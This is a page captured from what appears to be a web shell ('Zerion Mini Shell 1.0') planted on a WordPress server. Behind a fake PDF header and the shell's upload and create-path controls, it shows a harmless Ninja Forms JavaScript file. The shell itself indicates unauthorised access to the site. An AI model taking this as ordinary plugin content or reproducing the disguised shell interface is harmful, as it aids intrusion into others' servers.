%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /home/jalalj2hb/www/wp-content/plugins/ninja-forms/client/dashboard/models/
Upload File :
Create Path :
Current File : /home/jalalj2hb/www/wp-content/plugins/ninja-forms/client/dashboard/models/serviceCollection.js

define( ['models/serviceModel'], function( ServiceModel ) {
	var collection = Backbone.Collection.extend( {
		model: ServiceModel,
		comparator: 'name',

    url: function() {
        return ajaxurl + "?action=nf_services";
    },

		initialize: function() {
      /* ... */
		},

		/*
     * Use the `data` property of the response.
     */
    parse: function( response, options ){
        return response.data;
    },

	} );

	return collection;
} );

Zerion Mini Shell 1.0